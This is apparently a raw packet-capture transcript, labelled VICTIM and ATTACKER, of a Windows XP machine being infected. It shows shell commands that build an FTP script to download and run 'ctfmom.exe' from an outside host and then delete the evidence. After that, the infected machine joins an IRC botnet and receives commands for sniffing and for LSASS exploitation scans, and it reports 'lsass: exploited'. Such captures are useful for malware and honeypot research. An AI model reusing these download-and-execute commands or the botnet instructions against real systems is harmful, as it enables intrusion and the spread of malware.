VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32>
VICTIM: echo open 202.70.249.50 10220>.pif C:\\WINDOWS\\system32>
VICTIM: echo user a a>>.pif C:\\WINDOWS\\system32>
VICTIM: echo binary>>.pif C:\\WINDOWS\\system32>
VICTIM: echo GET ctfmom.exe>>.pif C:\\WINDOWS\\system32>
VICTIM: echo bye>>.pif C:\\WINDOWS\\system32>
VICTIM: echo @echo off >c.batC:\\WINDOWS\\system32>
VICTIM: echo ftp -n -v -s:.pif >>c.bat
VICTIM: C:\\WINDOWS\\system32>
VICTIM: echo ctfmom.exe >>c.batC:\\WINDOWS\\system32>
VICTIM: echo del .pif >>c.batC:\\WINDOWS\\system32>
VICTIM: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
VICTIM: echo exit /y >>c.batC:\\WINDOWS\\system32>
ATTACKER: 220
VICTIM: USER a
ATTACKER: 331
VICTIM: PASS a
ATTACKER: 230
VICTIM: TYPE I
ATTACKER: 200
VICTIM: PORT 192,168,1,5,4,9
ATTACKER: 200
ATTACKER: RETR ctfmom.exe
ATTACKER: 150
ATTACKER: 226
VICTIM: QUIT
ATTACKER: 221
VICTIM: NICK `qiwritmuUSER `qiwritmu 0 0 :`qiwritmu
ATTACKER: :aaa.39213.com 001 `qiwritmu :time, `qiwritmu!~qiwritmu@192.168.1.125:aaa.39213.com 005 `qiwritmu MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:aaa.39213.com 005 `qiwritmu WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=time CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:aaa.39213.com 422 `qiwritmu :MOTD File is missing:`qiwritmu MODE `qiwritmu :+i
VICTIM: JOIN #.has hs
VICTIM: USERHOST `qiwritmuJOIN #.has hsUSERHOST `qiwritmuJOIN #.has hsUSERHOST `qiwritmu
ATTACKER: :`qiwritmu!~qiwritmu@192.168.1.125 JOIN :#.has:aaa.39213.com 332 `qiwritmu #.has :`i.join #.r |`sniff.on -s:aaa.39213.com 333 `qiwritmu #.has sd 1214610771:aaa.39213.com 353 `qiwritmu @ #.has :`qiwritmu @s :aaa.39213.com 366 `qiwritmu #.has :End of /NAMES list.:aaa.39213.com 302 `qiwritmu :`qiwritmu=+~qiwritmu@192.168.1.125
:aaa.39213.com 302 `qiwritmu :`qiwritmu=+~qiwritmu@192.168.1.125 :aaa.39213.com 302 `qiwritmu :`qiwritmu=+~qiwritmu@192.168.1.125
VICTIM: JOIN #.r
ATTACKER: :`qiwritmu!~qiwritmu@192.168.1.125 JOIN :#.r:aaa.39213.com 332 `qiwritmu #.r :`adv.start lsass 100 3 0 x.x.x.x -r -b -s:aaa.39213.com 333 `qiwritmu #.r sd 1214610796:aaa.39213.com 353 `qiwritmu @ #.r :`qiwritmu @s :aaa.39213.com 366 `qiwritmu #.r :End of /NAMES list.
VICTIM: PRIVMSG #.lagja :lsass: exploited (127.29.96.72)
VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.125 on 48
ATTACKER: :aaa.39213.com 404 `qiwritmu #.lagja :No external channel messages (#.lagja):aaa.39213.com 404 `qiwritmu #.lagja :No external channel messages (#.lagja)
VICTIM: PRIVMSG #.lagja :lsass: exploited (127.144.200.66)
ATTACKER: :aaa.39213.com 404 `qiwritmu #.lagja :No external channel messages (#.lagja)
VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.125 on 48
ATTACKER: :aaa.39213.com 404 `qiwritmu #.lagja :No external channel messages (#.lagja)
VICTIM: PRIVMSG #.#. :(221.189.81.70:4797)(10.2.32.208:1027) 220
VICTIM: PRIVMSG #.#. :(10.2.32.208:1027)(221.189.81.70:4797) USER a PRIVMSG #.#. :(10.2.32.208:1027)(221.189.81.70:4797) PASS a
VICTIM: PRIVMSG #.#. :(221.189.81.70:4797)(10.2.32.208:1027) 230
ATTACKER: :aaa.39213.com 401 `qiwritmu #.#. :No such nick/channel:aaa.39213.com 401 `qiwritmu #.#. :No such nick/channel:aaa.39213.com 401 `qiwritmu #.#. :No such nick/channel:aaa.39213.com 401 `qiwritmu #.#.
:No such nick/channel
VICTIM: PRIVMSG #.lagja :lsass: exploited (127.238.49.245)
VICTIM: PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 48
VICTIM: PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 48
VICTIM: PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 48
VICTIM: PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 48
VICTIM: PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 4896PRIVMSG #.#. :(81.181.17.239:14425)(10.2.32.216:1032) 220 PRIVMSG #.#. :(10.2.32.216:1032)(81.181.17.239:14425) USER a PRIVMSG #.#. :(10.2.32.216:1032)(81.181.17.239:14425) PASS a PRIVMSG #.#. :(81.181.17.239:14425)(10.2.32.216:1032) 230